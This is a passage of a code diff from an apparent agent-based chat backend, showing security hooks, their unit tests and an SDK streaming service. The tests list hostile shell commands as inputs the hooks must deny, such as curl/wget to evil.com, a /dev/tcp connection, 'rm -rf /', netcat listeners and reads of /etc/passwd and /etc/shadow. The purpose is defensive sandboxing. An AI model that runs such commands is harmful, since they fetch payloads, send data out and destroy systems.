tool_use_id: str | None,
|
|
||||||
context: HookContext,
|
|
||||||
) -> SyncHookJSONOutput:
|
|
||||||
"""Log successful tool executions for observability."""
|
|
||||||
_ = context
|
|
||||||
tool_name = cast(str, input_data.get("tool_name", ""))
|
|
||||||
logger.debug(f"[SDK] Tool success: {tool_name}, tool_use_id={tool_use_id}")
|
|
||||||
return cast(SyncHookJSONOutput, {})
|
|
||||||
|
|
||||||
async def post_tool_failure_hook(
|
|
||||||
input_data: HookInput,
|
|
||||||
tool_use_id: str | None,
|
|
||||||
context: HookContext,
|
|
||||||
) -> SyncHookJSONOutput:
|
|
||||||
"""Log failed tool executions for debugging."""
|
|
||||||
_ = context
|
|
||||||
tool_name = cast(str, input_data.get("tool_name", ""))
|
|
||||||
error = input_data.get("error", "Unknown error")
|
|
||||||
logger.warning(
|
|
||||||
f"[SDK] Tool failed: {tool_name}, error={error}, "
|
|
||||||
f"user={user_id}, tool_use_id={tool_use_id}"
|
|
||||||
)
|
|
||||||
return cast(SyncHookJSONOutput, {})
|
|
||||||
|
|
||||||
async def pre_compact_hook(
|
|
||||||
input_data: HookInput,
|
|
||||||
tool_use_id: str | None,
|
|
||||||
context: HookContext,
|
|
||||||
) -> SyncHookJSONOutput:
|
|
||||||
"""Log when SDK triggers context compaction.
|
|
||||||
|
|
||||||
The SDK automatically compacts conversation history when it grows too large.
|
|
||||||
This hook provides visibility into when compaction happens.
|
|
||||||
"""
|
|
||||||
_ = context, tool_use_id
|
|
||||||
trigger = input_data.get("trigger", "auto")
|
|
||||||
logger.info(
|
|
||||||
f"[SDK] Context compaction triggered: {trigger}, user={user_id}"
|
|
||||||
)
|
|
||||||
return cast(SyncHookJSONOutput, {})
|
|
||||||
|
|
||||||
return {
|
|
||||||
"PreToolUse": [HookMatcher(matcher="*", hooks=[pre_tool_use_hook])],
|
|
||||||
"PostToolUse": [HookMatcher(matcher="*", hooks=[post_tool_use_hook])],
|
|
||||||
"PostToolUseFailure": [
|
|
||||||
HookMatcher(matcher="*", hooks=[post_tool_failure_hook])
|
|
||||||
],
|
|
||||||
"PreCompact": [HookMatcher(matcher="*", hooks=[pre_compact_hook])],
|
|
||||||
}
|
|
||||||
except ImportError:
|
|
||||||
# Fallback for when SDK isn't available - return empty hooks
|
|
||||||
logger.warning("claude-agent-sdk not available, security hooks disabled")
|
|
||||||
return {}
|
|
||||||
@@ -1,258 +0,0 @@
|
|||||||
"""Unit tests for SDK security hooks."""
|
|
||||||
|
|
||||||
import os
|
|
||||||
|
|
||||||
from .security_hooks import _validate_tool_access, _validate_user_isolation
|
|
||||||
|
|
||||||
SDK_CWD = "/tmp/copilot-abc123"
|
|
||||||
|
|
||||||
|
|
||||||
def _is_denied(result: dict) -> bool:
|
|
||||||
hook = result.get("hookSpecificOutput", {})
|
|
||||||
return hook.get("permissionDecision") == "deny"
|
|
||||||
|
|
||||||
|
|
||||||
# -- Blocked tools -----------------------------------------------------------
|
|
||||||
|
|
||||||
|
|
||||||
def test_blocked_tools_denied():
|
|
||||||
for tool in ("bash", "shell", "exec", "terminal", "command"):
|
|
||||||
result = _validate_tool_access(tool, {})
|
|
||||||
assert _is_denied(result), f"{tool} should be blocked"
|
|
||||||
|
|
||||||
|
|
||||||
def test_unknown_tool_allowed():
|
|
||||||
result = _validate_tool_access("SomeCustomTool", {})
|
|
||||||
assert result == {}
|
|
||||||
|
|
||||||
|
|
||||||
# -- Workspace-scoped tools --------------------------------------------------
|
|
||||||
|
|
||||||
|
|
||||||
def test_read_within_workspace_allowed():
|
|
||||||
result = _validate_tool_access(
|
|
||||||
"Read", {"file_path": f"{SDK_CWD}/file.txt"}, sdk_cwd=SDK_CWD
|
|
||||||
)
|
|
||||||
assert result == {}
|
|
||||||
|
|
||||||
|
|
||||||
def test_write_within_workspace_allowed():
|
|
||||||
result = _validate_tool_access(
|
|
||||||
"Write", {"file_path": f"{SDK_CWD}/output.json"}, sdk_cwd=SDK_CWD
|
|
||||||
)
|
|
||||||
assert result == {}
|
|
||||||
|
|
||||||
|
|
||||||
def test_edit_within_workspace_allowed():
|
|
||||||
result = _validate_tool_access(
|
|
||||||
"Edit", {"file_path": f"{SDK_CWD}/src/main.py"}, sdk_cwd=SDK_CWD
|
|
||||||
)
|
|
||||||
assert result == {}
|
|
||||||
|
|
||||||
|
|
||||||
def test_glob_within_workspace_allowed():
|
|
||||||
result = _validate_tool_access("Glob", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
|
|
||||||
assert result == {}
|
|
||||||
|
|
||||||
|
|
||||||
def test_grep_within_workspace_allowed():
|
|
||||||
result = _validate_tool_access("Grep", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
|
|
||||||
assert result == {}
|
|
||||||
|
|
||||||
|
|
||||||
def test_read_outside_workspace_denied():
|
|
||||||
result = _validate_tool_access(
|
|
||||||
"Read", {"file_path": "/etc/passwd"}, sdk_cwd=SDK_CWD
|
|
||||||
)
|
|
||||||
assert _is_denied(result)
|
|
||||||
|
|
||||||
|
|
||||||
def test_write_outside_workspace_denied():
|
|
||||||
result = _validate_tool_access(
|
|
||||||
"Write", {"file_path": "/home/user/secrets.txt"}, sdk_cwd=SDK_CWD
|
|
||||||
)
|
|
||||||
assert _is_denied(result)
|
|
||||||
|
|
||||||
|
|
||||||
def test_traversal_attack_denied():
|
|
||||||
result = _validate_tool_access(
|
|
||||||
"Read",
|
|
||||||
{"file_path": f"{SDK_CWD}/../../etc/passwd"},
|
|
||||||
sdk_cwd=SDK_CWD,
|
|
||||||
)
|
|
||||||
assert _is_denied(result)
|
|
||||||
|
|
||||||
|
|
||||||
def test_no_path_allowed():
|
|
||||||
"""Glob/Grep without a path argument defaults to cwd — should pass."""
|
|
||||||
result = _validate_tool_access("Glob", {}, sdk_cwd=SDK_CWD)
|
|
||||||
assert result == {}
|
|
||||||
|
|
||||||
|
|
||||||
def test_read_no_cwd_denies_absolute():
|
|
||||||
"""If no sdk_cwd is set, absolute paths are denied."""
|
|
||||||
result = _validate_tool_access("Read", {"file_path": "/tmp/anything"})
|
|
||||||
assert _is_denied(result)
|
|
||||||
|
|
||||||
|
|
||||||
# -- Tool-results directory --------------------------------------------------
|
|
||||||
|
|
||||||
|
|
||||||
def test_read_tool_results_allowed():
|
|
||||||
home = os.path.expanduser("~")
|
|
||||||
path = f"{home}/.claude/projects/-tmp-copilot-abc123/tool-results/12345.txt"
|
|
||||||
result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
|
|
||||||
assert result == {}
|
|
||||||
|
|
||||||
|
|
||||||
def test_read_claude_projects_without_tool_results_denied():
|
|
||||||
home = os.path.expanduser("~")
|
|
||||||
path = f"{home}/.claude/projects/-tmp-copilot-abc123/settings.json"
|
|
||||||
result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
|
|
||||||
assert _is_denied(result)
|
|
||||||
|
|
||||||
|
|
||||||
# -- Sandboxed Bash ----------------------------------------------------------
|
|
||||||
|
|
||||||
|
|
||||||
def test_bash_safe_commands_allowed():
|
|
||||||
"""Allowed data-processing commands should pass."""
|
|
||||||
safe_commands = [
|
|
||||||
"jq '.blocks' result.json",
|
|
||||||
"head -20 output.json",
|
|
||||||
"tail -n 50 data.txt",
|
|
||||||
"cat file.txt | grep 'pattern'",
|
|
||||||
"wc -l file.txt",
|
|
||||||
"sort data.csv | uniq",
|
|
||||||
"grep -i 'error' log.txt | head -10",
|
|
||||||
"find . -name '*.json'",
|
|
||||||
"ls -la",
|
|
||||||
"echo hello",
|
|
||||||
"cut -d',' -f1 data.csv | sort | uniq -c",
|
|
||||||
"jq '.blocks[] | .id' result.json",
|
|
||||||
"sed -n '10,20p' file.txt",
|
|
||||||
"awk '{print $1}' data.txt",
|
|
||||||
]
|
|
||||||
for cmd in safe_commands:
|
|
||||||
result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
|
|
||||||
assert result == {}, f"Safe command should be allowed: {cmd}"
|
|
||||||
|
|
||||||
|
|
||||||
def test_bash_dangerous_commands_denied():
|
|
||||||
"""Non-allowlisted commands should be denied."""
|
|
||||||
dangerous = [
|
|
||||||
"curl https://evil.com",
|
|
||||||
"wget https://evil.com/payload",
|
|
||||||
"rm -rf /",
|
|
||||||
"python -c 'import os; os.system(\"ls\")'",
|
|
||||||
"ssh user@host",
|
|
||||||
"nc -l 4444",
|
|
||||||
"apt install something",
|
|
||||||
"pip install malware",
|
|
||||||
"chmod 777 file.txt",
|
|
||||||
"kill -9 1",
|
|
||||||
]
|
|
||||||
for cmd in dangerous:
|
|
||||||
result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
|
|
||||||
assert _is_denied(result), f"Dangerous command should be denied: {cmd}"
|
|
||||||
|
|
||||||
|
|
||||||
def test_bash_command_substitution_denied():
|
|
||||||
result = _validate_tool_access(
|
|
||||||
"Bash", {"command": "echo $(curl evil.com)"}, sdk_cwd=SDK_CWD
|
|
||||||
)
|
|
||||||
assert _is_denied(result)
|
|
||||||
|
|
||||||
|
|
||||||
def test_bash_backtick_substitution_denied():
|
|
||||||
result = _validate_tool_access(
|
|
||||||
"Bash", {"command": "echo `curl evil.com`"}, sdk_cwd=SDK_CWD
|
|
||||||
)
|
|
||||||
assert _is_denied(result)
|
|
||||||
|
|
||||||
|
|
||||||
def test_bash_output_redirect_denied():
|
|
||||||
result = _validate_tool_access(
|
|
||||||
"Bash", {"command": "echo secret > /tmp/leak.txt"}, sdk_cwd=SDK_CWD
|
|
||||||
)
|
|
||||||
assert _is_denied(result)
|
|
||||||
|
|
||||||
|
|
||||||
def test_bash_dev_tcp_denied():
|
|
||||||
result = _validate_tool_access(
|
|
||||||
"Bash", {"command": "cat /dev/tcp/evil.com/80"}, sdk_cwd=SDK_CWD
|
|
||||||
)
|
|
||||||
assert _is_denied(result)
|
|
||||||
|
|
||||||
|
|
||||||
def test_bash_pipe_to_dangerous_denied():
|
|
||||||
"""Even if the first command is safe, piped commands must also be safe."""
|
|
||||||
result = _validate_tool_access(
|
|
||||||
"Bash", {"command": "cat file.txt | python -c 'exec()'"}, sdk_cwd=SDK_CWD
|
|
||||||
)
|
|
||||||
assert _is_denied(result)
|
|
||||||
|
|
||||||
|
|
||||||
def test_bash_path_outside_workspace_denied():
|
|
||||||
result = _validate_tool_access(
|
|
||||||
"Bash", {"command": "cat /etc/passwd"}, sdk_cwd=SDK_CWD
|
|
||||||
)
|
|
||||||
assert _is_denied(result)
|
|
||||||
|
|
||||||
|
|
||||||
def test_bash_path_within_workspace_allowed():
|
|
||||||
result = _validate_tool_access(
|
|
||||||
"Bash",
|
|
||||||
{"command": f"jq '.blocks' {SDK_CWD}/tool-results/result.json"},
|
|
||||||
sdk_cwd=SDK_CWD,
|
|
||||||
)
|
|
||||||
assert result == {}
|
|
||||||
|
|
||||||
|
|
||||||
def test_bash_empty_command_denied():
|
|
||||||
result = _validate_tool_access("Bash", {"command": ""}, sdk_cwd=SDK_CWD)
|
|
||||||
assert _is_denied(result)
|
|
||||||
|
|
||||||
|
|
||||||
# -- Dangerous patterns ------------------------------------------------------
|
|
||||||
|
|
||||||
|
|
||||||
def test_dangerous_pattern_blocked():
|
|
||||||
result = _validate_tool_access("SomeTool", {"cmd": "sudo rm -rf /"})
|
|
||||||
assert _is_denied(result)
|
|
||||||
|
|
||||||
|
|
||||||
def test_subprocess_pattern_blocked():
|
|
||||||
result = _validate_tool_access("SomeTool", {"code": "subprocess.run(...)"})
|
|
||||||
assert _is_denied(result)
|
|
||||||
|
|
||||||
|
|
||||||
# -- User isolation ----------------------------------------------------------
|
|
||||||
|
|
||||||
|
|
||||||
def test_workspace_path_traversal_blocked():
|
|
||||||
result = _validate_user_isolation(
|
|
||||||
"workspace_read", {"path": "../../../etc/shadow"}, user_id="user-1"
|
|
||||||
)
|
|
||||||
assert _is_denied(result)
|
|
||||||
|
|
||||||
|
|
||||||
def test_workspace_absolute_path_blocked():
|
|
||||||
result = _validate_user_isolation(
|
|
||||||
"workspace_read", {"path": "/etc/passwd"}, user_id="user-1"
|
|
||||||
)
|
|
||||||
assert _is_denied(result)
|
|
||||||
|
|
||||||
|
|
||||||
def test_workspace_normal_path_allowed():
|
|
||||||
result = _validate_user_isolation(
|
|
||||||
"workspace_read", {"path": "src/main.py"}, user_id="user-1"
|
|
||||||
)
|
|
||||||
assert result == {}
|
|
||||||
|
|
||||||
|
|
||||||
def test_non_workspace_tool_passes_isolation():
|
|
||||||
result = _validate_user_isolation(
|
|
||||||
"find_agent", {"query": "email"}, user_id="user-1"
|
|
||||||
)
|
|
||||||
assert result == {}
|
|
||||||
@@ -1,497 +0,0 @@
|
|||||||
"""Claude Agent SDK service layer for CoPilot chat completions."""
|
|
||||||
|
|
||||||
import asyncio
|
|
||||||
import json
|
|
||||||
import logging
|
|
||||||
import os
|
|
||||||
import re
|
|
||||||
import uuid
|
|
||||||
from collections.abc import AsyncGenerator
|
|
||||||
from typing import Any
|
|
||||||
|
|
||||||
from backend.util.exceptions import NotFoundError
|
|
||||||
|
|
||||||
from ..config import ChatConfig
|
|
||||||
from ..model import (
|
|
||||||
ChatMessage,
|
|
||||||
ChatSession,
|
|
||||||
get_chat_session,
|
|
||||||
update_session_title,
|
|
||||||
upsert_chat_session,
|
|
||||||
)
|
|
||||||
from ..response_model import (
|
|
||||||
StreamBaseResponse,
|
|
||||||
StreamError,
|
|
||||||
StreamFinish,
|
|
||||||
StreamStart,
|
|
||||||
StreamTextDelta,
|
|
||||||
StreamToolInputAvailable,
|
|
||||||
StreamToolOutputAvailable,
|
|
||||||
)
|
|
||||||
from ..service import _build_system_prompt, _generate_session_title
|
|
||||||
from ..tracking import track_user_message
|
|
||||||
from .anthropic_fallback import stream_with_anthropic
|
|
||||||
from .response_adapter import SDKResponseAdapter
|
|
||||||
from .security_hooks import create_security_hooks
|
|
||||||
from .tool_adapter import (
|
|
||||||
COPILOT_TOOL_NAMES,
|
|
||||||
create_copilot_mcp_server,
|
|
||||||
set_execution_context,
|
|
||||||
)
|
|
||||||
from .tracing import TracedSession, create_tracing_hooks, merge_hooks
|
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
|
||||||
config = ChatConfig()
|
|
||||||
|
|
||||||
# Set to hold background tasks to prevent garbage collection
|
|
||||||
_background_tasks: set[asyncio.Task[Any]] = set()
|
|
||||||
|
|
||||||
|
|
||||||
_SDK_CWD_PREFIX = "/tmp/copilot-"
|
|
||||||
|
|
||||||
# Appended to the system prompt to inform the agent about Bash restrictions.
|
|
||||||
# The SDK already describes each tool (Read, Write, Edit, Glob, Grep, Bash),
|
|
||||||
# but it doesn't know about our security hooks' command allowlist for Bash.
|
|
||||||
_SDK_TOOL_SUPPLEMENT = """
|
|
||||||
|
|
||||||
## Bash restrictions
|
|
||||||
|
|
||||||
The Bash tool is restricted to safe, read-only data-processing commands:
|
|
||||||
jq, grep, head, tail, cat, wc, sort, uniq, cut, tr, sed, awk, find, ls,
|
|
||||||
echo, diff, base64, and similar utilities.
|
|
||||||
Network commands (curl, wget), destructive commands (rm, chmod), and
|
|
||||||
interpreters (python, node) are NOT available.
|
|
||||||
"""
|
|
||||||
|
|
||||||
|
|
||||||
def _make_sdk_cwd(session_id: str) -> str:
|
|
||||||
"""Create a safe, session-specific working directory path.
|
|
||||||
|
|
||||||
Sanitizes session_id, then validates the resulting path stays under /tmp/
|
|
||||||
using normpath + startswith (the pattern CodeQL recognises as a sanitizer).
|
|
||||||
"""
|
|
||||||
# Step 1: Sanitize - only allow alphanumeric and hyphens
|
|
||||||
safe_id = re.sub(r"[^A-Za-z0-9-]", "", session_id)
|
|
||||||
if not safe_id:
|
|
||||||
raise ValueError("Session ID is empty after sanitization")
|
|
||||||
|
|
||||||
# Step 2: Construct path with known-safe prefix
|
|
||||||
cwd = os.path.normpath(f"{_SDK_CWD_PREFIX}{safe_id}")
|
|
||||||
|
|
||||||
# Step 3: Validate the path is still under our prefix (prevent traversal)
|
|
||||||
if not cwd.startswith(_SDK_CWD_PREFIX):
|
|
||||||
raise ValueError(f"Session path escaped prefix: {cwd}")
|
|
||||||
|
|
||||||
# Step 4: Additional assertion for defense-in-depth
|
|
||||||
assert cwd.startswith("/tmp/copilot-"), f"Path validation failed: {cwd}"
|
|
||||||
|
|
||||||
return cwd
|
|
||||||
|
|
||||||
|
|
||||||
def _cleanup_sdk_tool_results(cwd: str) -> None:
|
|
||||||
"""Remove SDK tool-result files for a specific session working directory.
|
|
||||||
|
|
||||||
The SDK creates tool-result files under ~/.claude/projects/<encoded-cwd>/tool-results/.
|
|
||||||
We clean only the specific cwd's results to avoid race conditions between
|
|
||||||
concurrent sessions.
|
|
||||||
|
|
||||||
Security: cwd MUST be created by _make_sdk_cwd() which sanitizes session_id.
|
|
||||||
"""
|
|
||||||
import shutil
|
|
||||||
|
|
||||||
# Security check 1: Validate cwd is under the expected prefix
|
|
||||||
normalized = os.path.normpath(cwd)
|
|
||||||
if not normalized.startswith(_SDK_CWD_PREFIX):
|
|
||||||
logger.warning(f"[SDK] Rejecting cleanup for invalid path: {cwd}")
|
|
||||||
return
|
|
||||||
|
|
||||||
# Security check 2: Ensure no path traversal in the normalized path
|
|
||||||
if ".." in normalized:
|
|
||||||
logger.warning(f"[SDK] Rejecting cleanup for traversal attempt: {cwd}")
|
|
||||||
return
|
|
||||||
|
|
||||||
# SDK encodes the cwd path by replacing '/' with '-'
|
|
||||||
encoded_cwd = normalized.replace("/", "-")
|
|
||||||
|
|
||||||
# Construct the project directory path (known-safe home expansion)
|
|
||||||
claude_projects = os.path.expanduser("~/.claude/projects")
|
|
||||||
project_dir = os.path.join(claude_projects, encoded_cwd)
|
|
||||||
|
|
||||||
# Security check 3: Validate project_dir is under ~/.claude/projects
|
|
||||||
project_dir = os.path.normpath(project_dir)
|
|
||||||
if not project_dir.startswith(claude_projects):
|
|
||||||
logger.warning(
|
|
||||||
f"[SDK] Rejecting cleanup for escaped project path: {project_dir}"
|
|
||||||
)
|
|
||||||
return
|
|
||||||
|
|
||||||
results_dir = os.path.join(project_dir, "tool-results")
|
|
||||||
if os.path.isdir(results_dir):
|
|
||||||
for filename in os.listdir(results_dir):
|
|
||||||
file_path = os.path.join(results_dir, filename)
|
|
||||||
try:
|
|
||||||
if os.path.isfile(file_path):
|
|
||||||
os.remove(file_path)
|
|
||||||
except OSError:
|
|
||||||
pass
|
|
||||||
|
|
||||||
# Also clean up the temp cwd directory itself
|
|
||||||
try:
|
|
||||||
shutil.rmtree(normalized, ignore_errors=True)
|
|
||||||
except OSError:
|
|
||||||
pass
|
|
||||||
|
|
||||||
|
|
||||||
async def _compress_conversation_history(
|
|
||||||
session: ChatSession,
|
|
||||||
) -> list[ChatMessage]:
|
|
||||||
"""Compress prior conversation messages if they exceed the token threshold.
|
|
||||||
|
|
||||||
Uses the shared compress_context() from prompt.py which supports:
|
|
||||||
- LLM summarization of old messages (keeps recent ones intact)
|
|
||||||
- Progressive content truncation as fallback
|
|
||||||
- Middle-out deletion as last resort
|
|
||||||
|
|
||||||
Returns the compressed prior messages (everything except the current message).
|
|
||||||
"""
|
|
||||||
prior = session.messages[:-1]
|
|
||||||
if len(prior) < 2:
|
|
||||||
return prior
|
|
||||||
|
|
||||||
from backend.util.prompt import compress_context
|
|
||||||
|
|
||||||
# Convert ChatMessages to dicts for compress_context
|
|
||||||
messages_dict = []
|
|
||||||
for msg in prior:
|
|
||||||
msg_dict: dict[str, Any] = {"role": msg.role}
|
|
||||||
if msg.content:
|
|
||||||
msg_dict["content"] = msg.content
|
|
||||||
if msg.tool_calls:
|
|
||||||
msg_dict["tool_calls"] = msg.tool_calls
|
|
||||||
if msg.tool_call_id:
|
|
||||||
msg_dict["tool_call_id"] = msg.tool_call_id
|
|
||||||
messages_dict.append(msg_dict)
|
|
||||||
|
|
||||||
try:
|
|
||||||
import openai
|
|
||||||
|
|
||||||
async with openai.AsyncOpenAI(
|
|
||||||
api_key=config.api_key, base_url=config.base_url, timeout=30.0
|
|
||||||
) as client:
|
|
||||||
result = await compress_context(
|
|
||||||
messages=messages_dict,
|
|
||||||
model=config.model,
|
|
||||||
client=client,
|
|
||||||
)
|
|
||||||
except Exception as e:
|
|
||||||
logger.warning(f"[SDK] Context compression with LLM failed: {e}")
|
|
||||||
# Fall back to truncation-only (no LLM summarization)
|
|
||||||
result = await compress_context(
|
|
||||||
messages=messages_dict,
|
|
||||||
model=config.model,
|
|
||||||
client=None,
|
|
||||||
)
|
|
||||||
|
|
||||||
if result.was_compacted:
|
|
||||||
logger.info(
|
|
||||||
f"[SDK] Context compacted: {result.original_token_count} -> "
|
|
||||||
f"{result.token_count} tokens "
|
|
||||||
f"({result.messages_summarized} summarized, "
|
|
||||||
f"{result.messages_dropped} dropped)"
|
|
||||||
)
|
|
||||||
# Convert compressed dicts back to ChatMessages
|
|
||||||
return [
|
|
||||||
ChatMessage(
|
|
||||||
role=m["role"],
|
|
||||||
content=m.get("content"),
|
|
||||||
tool_calls=m.get("tool_calls"),
|
|
||||||
tool_call_id=m.get("tool_call_id"),
|
|
||||||
)
|
|
||||||
for m in result.messages
|
|
||||||
]
|
|
||||||
|
|
||||||
return prior
|
|
||||||
|
|
||||||
|
|
||||||
def _format_conversation_context(messages: list[ChatMessage]) -> str | None:
|
|
||||||
"""Format conversation messages into a context prefix for the user message.
|
|
||||||
|
|
||||||
Returns a string like:
|
|
||||||
<conversation_history>
|
|
||||||
User: hello
|
|
||||||
You responded: Hi! How can I help?
|
|
||||||
</conversation_history>
|
|
||||||
|
|
||||||
Returns None if there are no messages to format.
|
|
||||||
"""
|
|
||||||
if not messages:
|
|
||||||
return None
|
|
||||||
|
|
||||||
lines: list[str] = []
|
|
||||||
for msg in messages:
|
|
||||||
if not msg.content:
|
|
||||||
continue
|
|
||||||
if msg.role == "user":
|
|
||||||
lines.append(f"User: {msg.content}")
|
|
||||||
elif msg.role == "assistant":
|
|
||||||
lines.append(f"You responded: {msg.content}")
|
|
||||||
# Skip tool messages — they're internal details
|
|
||||||
|
|
||||||
if not lines:
|
|
||||||
return None
|
|
||||||
|
|
||||||
return "<conversation_history>\n" + "\n".join(lines) + "\n</conversation_history>"
|
|
||||||
|
|
||||||
|
|
||||||
async def stream_chat_completion_sdk(
|
|
||||||
session_id: str,
|
|
||||||
message: str | None = None,
|
|
||||||
tool_call_response: str | None = None, # noqa: ARG001
|
|
||||||
is_user_message: bool = True,
|
|
||||||
user_id: str | None = None,
|
|
||||||
retry_count: int = 0, # noqa: ARG001
|
|
||||||
session: ChatSession | None = None,
|
|
||||||
context: dict[str, str] | None = None, # noqa: ARG001
|
|
||||||
) -> AsyncGenerator[StreamBaseResponse, None]:
|
|
||||||
"""Stream chat completion using Claude Agent SDK.
|
|
||||||
|
|
||||||
Drop-in replacement for stream_chat_completion with improved reliability.
|
|
||||||
"""
|
|
||||||
|
|
||||||
if session is None:
|
|
||||||
session = await get_chat_session(session_id, user_id)
|
|
||||||
|
|
||||||
if not session:
|
|
||||||
raise NotFoundError(
|
|
||||||
f"Session {session_id} not found. Please create a new session first."
|
|
||||||
)
|
|
||||||
|
|
||||||
if message:
|
|
||||||
session.messages.append(
|
|
||||||
ChatMessage(
|
|
||||||
role="user" if is_user_message else "assistant", content=message
|
|
||||||
)
|
|
||||||
)
|
|
||||||
if is_user_message:
|
|
||||||
track_user_message(
|
|
||||||
user_id=user_id, session_id=session_id, message_length=len(message)
|
|
||||||
)
|
|
||||||
|
|
||||||
session = await upsert_chat_session(session)
|
|
||||||
|
|
||||||
# Generate title for new sessions (first user message)
|
|
||||||
if is_user_message and not session.title:
|
|
||||||
user_messages = [m for m in session.messages if m.role == "user"]
|
|
||||||
if len(user_messages) == 1:
|
|
||||||
first_message = user_messages[0].content or message or ""
|
|
||||||
if first_message:
|
|
||||||
task = asyncio.create_task(
|
|
||||||
_update_title_async(session_id, first_message, user_id)
|
|
||||||
)
|
|
||||||
_background_tasks.add(task)
|
|
||||||
task.add_done_callback(_background_tasks.discard)
|
|
||||||
|
|
||||||
# Build system prompt (reuses non-SDK path with Langfuse support)
|
|
||||||
has_history = len(session.messages) > 1
|
|
||||||
system_prompt, _ = await _build_system_prompt(
|
|
||||||
user_id, has_conversation_history=has_history
|
|
||||||
)
|
|
||||||
system_prompt += _SDK_TOOL_SUPPLEMENT
|
|
||||||
message_id = str(uuid.uuid4())
|
|
||||||
text_block_id = str(uuid.uuid4())
|
|
||||||
task_id = str(uuid.uuid4())
|
|
||||||
|
|
||||||
yield StreamStart(messageId=message_id, taskId=task_id)
|
|
||||||
|
|
||||||
stream_completed = False
|
|
||||||
# Use a session-specific temp dir to avoid cleanup race conditions
|
|
||||||
# between concurrent sessions.
|
|
||||||
sdk_cwd = _make_sdk_cwd(session_id)
|
|
||||||
os.makedirs(sdk_cwd, exist_ok=True)
|
|
||||||
|
|
||||||
set_execution_context(user_id, session, None)
|
|
||||||
|
|
||||||
try:
|
|
||||||
try:
|
|
||||||
from claude_agent_sdk import ClaudeAgentOptions, ClaudeSDKClient
|
|
||||||
|
|
||||||
mcp_server = create_copilot_mcp_server()
|
|
||||||
|
|
||||||
# Initialize Langfuse tracing (no-op if not configured)
|
|
||||||
tracer = TracedSession(session_id, user_id, system_prompt)
|
|
||||||
|
|
||||||
# Merge security hooks with optional tracing hooks
|
|
||||||
security_hooks = create_security_hooks(user_id, sdk_cwd=sdk_cwd)
|
|
||||||
tracing_hooks = create_tracing_hooks(tracer)
|
|
||||||
combined_hooks = merge_hooks(security_hooks, tracing_hooks)
|
|
||||||
|
|
||||||
options = ClaudeAgentOptions(
|
|
||||||
system_prompt=system_prompt,
|
|
||||||
mcp_servers={"copilot": mcp_server}, # type: ignore[arg-type]
|
|
||||||
allowed_tools=COPILOT_TOOL_NAMES,
|
|
||||||
hooks=combined_hooks, # type: ignore[arg-type]
|
|
||||||
cwd=sdk_cwd,
|
|
||||||
max_buffer_size=config.sdk_max_buffer_size,
|
|
||||||
)
|
|
||||||
|
|
||||||
adapter = SDKResponseAdapter(message_id=message_id)
|
|
||||||
adapter.set_task_id(task_id)
|
|
||||||
|
|
||||||
async with tracer, ClaudeSDKClient(options=options) as client:
|
|
||||||
current_message = message or ""
|
|
||||||
if not current_message and session.messages:
|
|
||||||
last_user = [m for m in session.messages if m.role == "user"]
|
|
||||||
if last_user:
|
|
||||||
current_message = last_user[-1].content or ""
|
|
||||||
|
|
||||||
if not current_message.strip():
|
|
||||||
yield StreamError(
|
|
||||||
errorText="Message cannot be empty.",
|
|
||||||
code="empty_prompt",
|
|
||||||
)
|
|
||||||
yield StreamFinish()
|
|
||||||
return
|
|
||||||
|
|
||||||
# Build query with conversation history context.
|
|
||||||
# Compress history first to handle long conversations.
|
|
||||||
query_message = current_message
|
|
||||||
if len(session.messages) > 1:
|
|
||||||
compressed = await _compress_conversation_history(session)
|
|
||||||
history_context = _format_conversation_context(compressed)
|
|
||||||
if history_context:
|
|
||||||
query_message = (
|
|
||||||
f"{history_context}\n\n"
|
|
||||||
f"Now, the user says:\n{current_message}"
|
|
||||||
)
|
|
||||||
|
|
||||||
logger.info(
|
|
||||||
f"[SDK] Sending query: {current_message[:80]!r}"
|
|
||||||
f" ({len(session.messages)} msgs in session)"
|
|
||||||
)
|
|
||||||
tracer.log_user_message(current_message)
|
|
||||||
await client.query(query_message, session_id=session_id)
|
|
||||||
|
|
||||||
assistant_response = ChatMessage(role="assistant", content="")
|
|
||||||
accumulated_tool_calls: list[dict[str, Any]] = []
|
|
||||||
has_appended_assistant = False
|
|
||||||
has_tool_results = False
|
|
||||||
|
|
||||||
async for sdk_msg in client.receive_messages():
|
|
||||||
logger.debug(
|
|
||||||
f"[SDK] Received: {type(sdk_msg).__name__} "
|
|
||||||
f"{getattr(sdk_msg, 'subtype', '')}"
|
|
||||||
)
|
|
||||||
tracer.log_sdk_message(sdk_msg)
|
|
||||||
for response in adapter.convert_message(sdk_msg):
|
|
||||||
if isinstance(response, StreamStart):
|
|
||||||
continue
|
|
||||||
yield response
|
|
||||||
|
|
||||||
if isinstance(response, StreamTextDelta):
|
|
||||||
delta = response.delta or ""
|
|
||||||
# After tool results, start a new assistant
|
|
||||||
# message for the post-tool text.
|
|
||||||
if has_tool_results and has_appended_assistant:
|
|
||||||
assistant_response = ChatMessage(
|
|
||||||
role="assistant", content=delta
|
|
||||||
)
|
|
||||||
accumulated_tool_calls = []
|
|
||||||
has_appended_assistant = False
|
|
||||||
has_tool_results = False
|
|
||||||
session.messages.append(assistant_response)
|
|
||||||
has_appended_assistant = True
|
|
||||||
else:
|
|
||||||
assistant_response.content = (
|
|
||||||
assistant_response.content or ""
|
|
||||||
) + delta
|
|
||||||
if not has_appended_assistant:
|
|
||||||
session.messages.append(assistant_response)
|
|
||||||
has_appended_assistant = True
|
|
||||||
|
|
||||||
elif isinstance(response, StreamToolInputAvailable):
|
|
||||||
accumulated_tool_calls.append(
|
|
||||||
{
|
|
||||||
"id": response.toolCallId,
|
|
||||||
"type": "function",
|
|
||||||
"function": {
|
|
||||||
"name": response.toolName,
|
|
||||||
"arguments": json.dumps(response.input or {}),
|
|
||||||
},
|
|
||||||
}
|
|
||||||
)
|
|
||||||
assistant_response.tool_calls = accumulated_tool_calls
|
|
||||||
if not has_appended_assistant:
|
|
||||||
session.messages.append(assistant_response)
|
|
||||||
has_appended_assistant = True
|
|
||||||
|
|
||||||
elif isinstance(response, StreamToolOutputAvailable):
|
|
||||||
session.messages.append(
|
|
||||||
ChatMessage(
|
|
||||||
role="tool",
|
|
||||||
content=(
|
|
||||||
response.output
|
|
||||||
if isinstance(response.output, str)
|
|
||||||
else str(response.output)
|
|
